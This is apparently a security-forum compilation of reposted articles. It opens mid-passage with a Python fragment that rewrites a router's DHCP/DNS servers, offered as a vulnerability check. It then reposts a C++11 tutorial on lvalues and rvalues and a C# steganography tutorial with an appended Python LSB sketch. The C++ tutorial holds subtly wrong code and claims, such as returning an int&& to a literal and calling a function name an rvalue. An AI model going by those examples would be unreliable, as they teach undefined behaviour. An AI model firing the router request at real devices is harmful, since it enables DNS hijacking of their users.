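       "&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6")

# Register the credentials so urllib answers the HTTP 401 challenge the same
# way a browser resends credentials taken from the URL.
password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, "http://" + ROUTER + "/", USER, PASSWORD)
opener = urllib.request.build_opener(
    urllib.request.HTTPBasicAuthHandler(password_mgr))

# Uncomment to actually fire the request (this DOES rewrite the DHCP/DNS
# settings on a vulnerable device, exactly like step 3 above):
# with opener.open(url, timeout=5) as resp:
#     print(resp.status)
```

If the request succeeds and the DHCP page afterwards shows 8.8.4.4/8.8.8.8, the device is vulnerable; remember to revert the settings as in step 6.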
-
C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues

October 30, 2013 by Danny Kalev

Every C++ programmer is familiar with the terms lvalue and rvalue. It's no surprise, since the C++ standard uses them "all over", as do many textbooks. But what do they mean? Are they still relevant now that C++11 has five value categories? It's about time to clear up the mystery and get rid of the myths.

Lvalues and rvalues were introduced in a seminal article by Strachey et al (1963) that presented CPL. A CPL expression appearing on the left-hand side of an assignment expression is evaluated as a memory address into which the right-hand side value is written. Later, left-hand expressions and right-hand expressions became lvalues and rvalues, respectively. One of CPL's descendants, B, was the language on which Dennis Ritchie based C. Ritchie borrowed the term lvalue to refer to a memory region to which a C program can write the right-hand side value of an assignment expression. He left out rvalues, feeling that lvalue and "not lvalue" would suffice. Later, rvalue made it into K&R C and ISO C++. C++11 extended the notion of rvalues even further by letting you bind rvalue references to them.

Although nowadays lvalues and rvalues have slightly different meanings from their original CPL meanings, they are encoded "in the genes of C++," to quote Bjarne Stroustrup. Therefore, understanding what they mean and how the addition of move semantics affected them can help you understand certain C++ features and idioms better -- and write better code.

Right from Wrong

Before attempting to define lvalues, let's look at some examples:

int x=9;
std::string s;
int *p=0;
int &ri=x;

The identifiers x, s, p and ri are all lvalues.
Indeed, they can appear on the left-hand side of an assignment expression and therefore seem to justify the CPL generalization: "Anything that can appear on the left-hand side of an assignment expression is an lvalue." However, counter-examples are readily available:

void func(const int * pi, const int & ri)
{
    *pi=7; //compilation error, *pi is const
    ri=8;  //compilation error, ri is const
}

*pi and ri are const lvalues. Therefore, they cannot appear on the left-hand side of an expression after their initialization. This property doesn't make them rvalues, though. Now let's look at some examples of rvalues. Literals such as 7, 'a', false and "hello world!" are instances of rvalues:

7==x;
char c='a';
bool clear=false;
const char s[]="hello world!";

Another subcategory of rvalues is temporaries. During the evaluation of an expression, an implementation may create a temporary object that stores an intermediary result:

int func(int y, int z, int w)
{
    int x=0;
    x=(y*z)+w;
    return x;
}

In this case, an implementation may create a temporary int to store the result of the sub-expression y*z. Conceptually, a temporary expires once its expression is fully evaluated. Put differently, it goes out of scope or gets destroyed upon reaching the nearest semicolon. You can create temporaries explicitly, too. An expression in the form C(arguments) creates a temporary object of type C:

cout<<std::string("test").size()<<endl;

Contrary to the CPL generalization, rvalues may appear on the left-hand side of an assignment expression in certain cases:

string ()={"hello"}; //creates a temp string

You're probably more familiar with the shorter form of this idiom:

string("hello"); //creates a temp string

Clearly, the CPL generalization doesn't really cut it for C++, although intuitively, it does capture the semantic difference between lvalues and rvalues. So, what do lvalues and rvalues really stand for?
A Matter of Identity

An expression is a program statement that yields a value, for example a function call, a sizeof expression, an arithmetic expression, a logical expression, and so on. You can classify C++ expressions into two categories: values with identity and values with no identity. In this context, identity means a name, a pointer, or a reference that enables you to determine if two objects are the same, to change the state of an object, or copy it:

struct {int x; int y;} s; //no type name, value has id
string &rs= *new string;
const char *p= rs.data();

s, rs and p are identities of values. We can draw the following generalization: lvalues in C++03 are values that have identity. By contrast, rvalues in C++03 are values that have no identity. C++03 rvalues are accessible only inside the expression in which they are created:

int& func();
int func2();
func();  //this call is an lvalue
func2(); //this call is an rvalue
sizeof(short); //rvalue
new double; //new expressions are rvalues
S::S() {this->x=0; /*this is an rvalue expression*/}

A function's name (not to be confused with a function call) is an rvalue expression that evaluates to the function's address. Similarly, an array's name is an rvalue expression that evaluates to the address of the first element of the array:

int& func3();
int& (*pf)()=func3; //func3 is an rvalue
int arr[2];
int* pi=arr; //arr is an rvalue

Because rvalues are short-lived, you have to capture them in lvalues if you wish to access them outside the context of their expression:

std::size_t n=sizeof(short);
double *pd=new double;
struct S
{
    int x, y;
    S() { S *p=this; p->x=0; p->y=0; }
};

Remember that any expression that evaluates to an lvalue reference (e.g., a function call, an overloaded assignment operator, etc.) is an lvalue. Any expression that returns an object by value is an rvalue. Prior to C++11, identity (or the lack thereof) was the main criterion for distinguishing between lvalues and rvalues.
However, the addition of rvalue references and move semantics to C++11 added a twist to the plot.

Binding Rvalues

C++11 lets you bind rvalue references to rvalues, effectively prolonging their lifetime as if they were lvalues:

//C++11
int && func2(){
    return 17; //returns an rvalue
}
int main()
{
    int x=0;
    int&& rr=func2();
    cout<<rr<<endl; //output: 17
    x=rr; // x=17 after the assignment
}

Using lvalue references where rvalue references are required is an error:

int& func2(){ //compilation error: cannot bind
    return 17; //an lvalue reference to an rvalue
}

In C++03 copying the rvalue to an lvalue is the preferred choice (in some cases you can bind an lvalue reference to const to achieve a similar effect):

int func2(){ // an rvalue expression
    return 17;
}
int m=func2(); // C++03-style copying

For fundamental types, the copy approach is reasonable. However, as far as class objects are concerned, spurious copying might incur performance overhead. Instead, C++11 encourages you to move objects. Moving means pilfering the resources of the source object, instead of copying it. For further information about move semantics, read C++11 Tutorial: Introducing the Move Constructor and the Move Assignment Operator.

//C++11 move semantics in action
string source ("abc"), target;
target=std::move(source); //pilfer source
//source no longer owns the resource
cout<<"source: "<<source<<endl; //source:
cout<<"target: "<<target<<endl; //target: abc

How does move semantics affect the semantics of lvalues and rvalues?

The Semantics of Change

In C++03, all you needed to know was whether a value had identity. In C++11 you also have to examine another property: movability. The combination of identity and movability (i and m, respectively, with a minus sign indicating negation) produces five meaningful value categories in C++11 -- "a whole type-zoo," as one of my Twitter followers put it:

i-m: lvalues are non-movable objects with identity. These are classic C++03 lvalues from the pre-move era. The expression *p, where p is a pointer to an object, is an lvalue. Similarly, dereferencing a pointer to a function is an lvalue.

im: xvalues ("eXpiring" values) refer to objects near the end of their lifetime (before their resources are moved, for example). An xvalue is the result of certain kinds of expressions involving rvalue references, e.g., std::move(mystr);

i: glvalues, or generalized lvalues, are values with identity. These include lvalues and xvalues.

m: rvalues include xvalues, temporaries, and values that have no identity.

-im: prvalues, or pure rvalues, are rvalues that are not xvalues. Prvalues include literals and function calls whose return type is not a reference.

A detailed discussion about the new value categories is available in section 3.10 of the C++11 standard. It has often been said that the original semantics of C++03 lvalues and rvalues remains unchanged in C++11. However, the C++11 taxonomy isn't quite the same as that of C++03; in C++11, every expression belongs to exactly one of the value classifications lvalue, xvalue, or prvalue.

In Conclusion

Fifty years after their inception, lvalues and rvalues are still relevant not only in C++ but in many contemporary programming languages. C++11 changed the semantics of rvalues, introducing xvalues and prvalues. Conceptually, you can tame this type-zoo by grouping the five value categories into supersets, where glvalues include lvalues and xvalues, and rvalues include xvalues and prvalues. Still confused? It's not you. It's BCPL's heritage that exhibits unusual vitality in a world that's light years away from the punched card and 16 kilobyte RAM era.

About the author: Danny Kalev is a certified system analyst and software engineer specializing in C++. Kalev has written several C++ textbooks and contributes C++ content regularly on various software developers' sites. He was a member of the C++ standards committee and has a master's degree in general linguistics.
He’s now pursuing a PhD in linguistics. Follow him on Twitter. Sursa: C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues
-
[h=1]Steganography: Simple Implementation in C#[/h]
By Hamzeh soboh, 31 Oct 2013

Download source - 154.3 KB

[h=2]Introduction[/h]
Steganography is the art and science of hiding information by embedding messages within others. Steganography works by replacing bits of useless or unused data in regular computer files with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.

I've implemented two methods that can be used to embed/extract text in/from an image. The first one is embedText, which receives the text you want to embed and the Bitmap object of the original image (your image before embedding the text in it), and returns the Bitmap object of the image after embedding the text in it. You can then export the Bitmap object into an image file. It is optional to encrypt your text before starting the process for extra security. You are then free to send the result image by email or keep it on your flash memory, for example. The second method is extractText, which receives the Bitmap object of the processed image (the image that has already been used to embed the text in) and returns the text that has been extracted.

[h=2]Executing the Code[/h]
If you download the attached testing project, it allows you to open an image, write your text or import a text file, optionally encrypt your text before processing, embed the text in the image, and finally save the result image into an image file. You can then reopen the application and the image that you've saved, and extract the text from it.

[h=2]Using the Code[/h]
The SteganographyHelper class contains the needed methods to embed/extract text in/from an image.

CAUTION: Don't save the result image in a lossy format (like JPEG); your data will be lost. Saving it as PNG is pretty good.
class SteganographyHelper
{
    enum State { hiding, filling_with_zeros };

    public static Bitmap embedText(string text, Bitmap bmp)
    {
        State s = State.hiding;
        int charIndex = 0;
        int charValue = 0;
        long colorUnitIndex = 0;
        int zeros = 0;
        int R = 0, G = 0, B = 0;

        for (int i = 0; i < bmp.Height; i++)
        {
            for (int j = 0; j < bmp.Width; j++)
            {
                Color pixel = bmp.GetPixel(j, i);
                // Clear the least significant bit of each color component
                pixel = Color.FromArgb(pixel.R - pixel.R % 2,
                                       pixel.G - pixel.G % 2,
                                       pixel.B - pixel.B % 2);
                R = pixel.R; G = pixel.G; B = pixel.B;

                for (int n = 0; n < 3; n++)
                {
                    if (colorUnitIndex % 8 == 0)
                    {
                        if (zeros == 8)
                        {
                            if ((colorUnitIndex - 1) % 3 < 2)
                            {
                                bmp.SetPixel(j, i, Color.FromArgb(R, G, B));
                            }
                            return bmp;
                        }
                        if (charIndex >= text.Length)
                        {
                            s = State.filling_with_zeros;
                        }
                        else
                        {
                            charValue = text[charIndex++];
                        }
                    }

                    switch (colorUnitIndex % 3)
                    {
                        case 0:
                        {
                            if (s == State.hiding)
                            {
                                R += charValue % 2;
                                charValue /= 2;
                            }
                        } break;
                        case 1:
                        {
                            if (s == State.hiding)
                            {
                                G += charValue % 2;
                                charValue /= 2;
                            }
                        } break;
                        case 2:
                        {
                            if (s == State.hiding)
                            {
                                B += charValue % 2;
                                charValue /= 2;
                            }
                            bmp.SetPixel(j, i, Color.FromArgb(R, G, B));
                        } break;
                    }

                    colorUnitIndex++;

                    if (s == State.filling_with_zeros)
                    {
                        zeros++;
                    }
                }
            }
        }
        return bmp;
    }

    public static string extractText(Bitmap bmp)
    {
        int colorUnitIndex = 0;
        int charValue = 0;
        string extractedText = String.Empty;

        for (int i = 0; i < bmp.Height; i++)
        {
            for (int j = 0; j < bmp.Width; j++)
            {
                Color pixel = bmp.GetPixel(j, i);
                for (int n = 0; n < 3; n++)
                {
                    switch (colorUnitIndex % 3)
                    {
                        case 0:
                        {
                            charValue = charValue * 2 + pixel.R % 2;
                        } break;
                        case 1:
                        {
                            charValue = charValue * 2 + pixel.G % 2;
                        } break;
                        case 2:
                        {
                            charValue = charValue * 2 + pixel.B % 2;
                        } break;
                    }

                    colorUnitIndex++;

                    if (colorUnitIndex % 8 == 0)
                    {
                        charValue = reverseBits(charValue);
                        if (charValue == 0) // a zero byte marks the end of the text
                        {
                            return extractedText;
                        }
                        char c = (char)charValue;
                        extractedText += c.ToString();
                    }
                }
            }
        }
        return extractedText;
    }

    public static int reverseBits(int n)
    {
        int result = 0;
        for (int i = 0; i < 8; i++)
        {
            result = result * 2 + n % 2;
            n /= 2;
        }
        return result;
    }
}

You can use the following code snippet to save the result image:

private void saveImageAs()
{
    SaveFileDialog save_dialog = new SaveFileDialog();
    save_dialog.Filter = "PNG|*.png|Bitmap|*.bmp";
    if (save_dialog.ShowDialog() == DialogResult.OK)
    {
        // Note: SaveFileDialog.FilterIndex is 1-based, so PNG is 1 and Bitmap is 2
        switch (save_dialog.FilterIndex)
        {
            case 1: bmp.Save(save_dialog.FileName, ImageFormat.Png); break;
            case 2: bmp.Save(save_dialog.FileName, ImageFormat.Bmp); break;
        }
    }
}

[h=2]License[/h]
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

Sursa: Steganography: Simple Implementation in C# - CodeProject
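For readers who want to experiment with the underlying idea outside of C#, here is a simplified sketch of least-significant-bit embedding in Python. It mirrors the scheme described above (one message bit per color unit, a zero byte as terminator) but operates on a plain list of color values; it is an illustration, not a line-for-line port of the SteganographyHelper class:

```python
def embed(text: str, pixels: list) -> list:
    """Hide `text` in the least significant bits of a flat
    [R, G, B, R, G, B, ...] color-unit list; a zero byte ends the message."""
    bits = []
    for byte in text.encode("ascii") + b"\x00":          # NUL terminator
        bits.extend((byte >> i) & 1 for i in range(8))   # LSB first
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for the message")
    out = pixels[:]
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit   # overwrite only the lowest bit
    return out

def extract(pixels: list) -> str:
    """Collect LSBs in groups of eight until the zero terminator."""
    chars = []
    for i in range(0, len(pixels) - 7, 8):
        byte = sum((pixels[i + j] & 1) << j for j in range(8))
        if byte == 0:
            break
        chars.append(chr(byte))
    return "".join(chars)

cover = list(range(256)) * 3       # stand-in for real R/G/B channel values
stego = embed("hi", cover)
print(extract(stego))              # -> hi
```

Because only the lowest bit of each color unit changes, the visual difference per channel is at most 1 out of 255, which is why the hidden data survives lossless formats like PNG but not lossy recompression.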